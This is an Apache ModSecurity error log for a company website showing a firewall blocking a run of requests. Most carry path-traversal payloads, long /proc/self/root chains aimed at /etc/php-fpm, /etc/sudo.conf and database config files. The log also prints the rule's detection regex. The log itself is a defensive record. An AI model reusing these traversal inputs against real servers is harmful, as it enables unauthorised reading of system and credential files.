[Wed Mar 18 03:41:08.067141 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:56468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJBOw_le52K8_3pV2ejAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:09.303428 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:56480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJBeoXxyEfFpUF8f8rSwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:12.020836 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:46858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJCNY0UrI5A3LftIxPZQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:13.559488 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:46872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJCda6ubjKNq_cu4ZUTwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:19.487029 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:46886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJD-yqAr6etmhZHNp2sAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:20.763496 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:40676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJEAkwaGbbGflqUZDRXQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:24.224606 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:40692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJFNa6ubjKNq_cu4ZUXwAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:28.726116 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:40706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJGCmAPhZkrhU8w4ksUQAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:30.127825 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:58310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJGuw_le52K8_3pV2elQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:32.513453 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:58318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJHAkwaGbbGflqUZDRYwAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:34.911725 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:58330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJHta6ubjKNq_cu4ZUbQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:37.355325 2026] [:error] [pid 17653:tid 140411674785536] [client 216.73.216.191:1826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJIcdf6f5d65gmYZSOswAAAsg"]
[Wed Mar 18 03:41:37.378806 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:58342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJIQkwaGbbGflqUZDRawAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:38.537675 2026] [:error] [pid 17653:tid 140411574073088] [client 216.73.216.191:59970] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJIsdf6f5d65gmYZSOtQAAAtQ"]
[Wed Mar 18 03:41:38.683182 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:58354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJItY0UrI5A3LftIxPcwAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:39.938660 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:53698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJI-oXxyEfFpUF8f8rXwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:41.287108 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:53706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJJfu8EFLIOrSqIpvFCwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:41.787301 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.244.43:45084] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpJJda6ubjKNq_cu4ZUdQAAA0c"]
[Wed Mar 18 03:41:42.524391 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:53708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJJuyqAr6etmhZHNp2swAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:46.029860 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:53716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJKkzinOy1jxa1j4fQXAAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:49.407801 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:53732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJLdY0UrI5A3LftIxPggAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:50.739623 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:45396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJLimAPhZkrhU8w4ksVQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:52.033925 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:45408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJMOyqAr6etmhZHNp2tgAAAFE"], referer: 